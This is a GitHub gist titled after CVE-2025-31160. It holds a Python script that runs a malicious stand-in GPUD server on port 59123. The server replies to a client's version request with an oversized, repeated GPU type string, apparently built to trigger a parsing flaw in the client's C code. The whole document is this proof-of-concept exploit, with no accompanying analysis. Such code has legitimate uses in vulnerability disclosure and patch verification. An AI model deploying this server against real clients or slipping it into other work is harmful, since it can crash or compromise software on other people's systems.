-
-
Save jkstill/8b057cc3fc9a3bb35e5a7dc34e290bd8 to your computer and use it in GitHub Desktop.
Bismuth CVE-2025-31160
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket | |
import struct | |
import threading | |
import time | |
GPUDPORT = 59123 | |
APIVERSION = 1 | |
class GPUDServer: | |
def __init__(self, port=GPUDPORT): | |
self.port = port | |
self.server_socket = None | |
self.running = False | |
self.clients = [] | |
def start(self): | |
"""Start the GPUD server""" | |
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) | |
self.server_socket.bind(('127.0.0.1', self.port)) | |
self.server_socket.listen(5) | |
self.running = True | |
print(f"GPUD Server started on port {self.port}") | |
# Start accepting client connections | |
accept_thread = threading.Thread(target=self.accept_connections) | |
accept_thread.daemon = True | |
accept_thread.start() | |
return accept_thread | |
def accept_connections(self): | |
"""Accept incoming client connections""" | |
while self.running: | |
try: | |
client_socket, address = self.server_socket.accept() | |
print(f"Client connected: {address}") | |
# Start a new thread to handle this client | |
client_thread = threading.Thread( | |
target=self.handle_client, | |
args=(client_socket, address) | |
) | |
client_thread.daemon = True | |
client_thread.start() | |
self.clients.append((client_socket, address, client_thread)) | |
except: | |
break | |
def handle_client(self, client_socket, address): | |
"""Handle client connection and process requests""" | |
try: | |
# Receive the 'T' and APIVERSION from client | |
request = client_socket.recv(2) | |
print("REQ", request) | |
if len(request) == 2 and request[0] == ord('T') and request[1] == APIVERSION: | |
print(f"Received valid type request from {address}") | |
# Prepare GPU type information | |
gpu_info = self.get_gpu_type_info() | |
# Create prelude: version (1 byte) + length (3 bytes) | |
# Pack as big-endian (>) uint32 (I) | |
length = len(gpu_info) | |
prelude = struct.pack('>I', (APIVERSION << 24) | (length & 0xFFFFFF)) | |
# Send prelude | |
client_socket.sendall(prelude) | |
# Send GPU information | |
client_socket.sendall(gpu_info.encode('utf-8')) | |
print(f"Sent response to {address}") | |
else: | |
print(f"Invalid request from {address}") | |
except Exception as e: | |
print(f"Error handling client {address}: {e}") | |
finally: | |
client_socket.close() | |
def get_gpu_type_info(self): | |
""" | |
Generate GPU type information to send to client. | |
Format should match what gputype_parse() in the C code expects. | |
""" | |
gpu_info = "1@" + ("a b c@" * 100) | |
return gpu_info | |
def stop(self): | |
"""Stop the server and close all connections""" | |
self.running = False | |
# Close all client connections | |
for client_socket, _, _ in self.clients: | |
try: | |
client_socket.close() | |
except: | |
pass | |
# Close server socket | |
if self.server_socket: | |
self.server_socket.close() | |
print("GPUD Server stopped") | |
def main(): | |
server = GPUDServer() | |
accept_thread = server.start() | |
try: | |
# Keep the server running until Ctrl+C | |
while True: | |
time.sleep(1) | |
except KeyboardInterrupt: | |
print("Shutting down server...") | |
finally: | |
server.stop() | |
accept_thread.join(timeout=2) | |
if __name__ == "__main__": | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment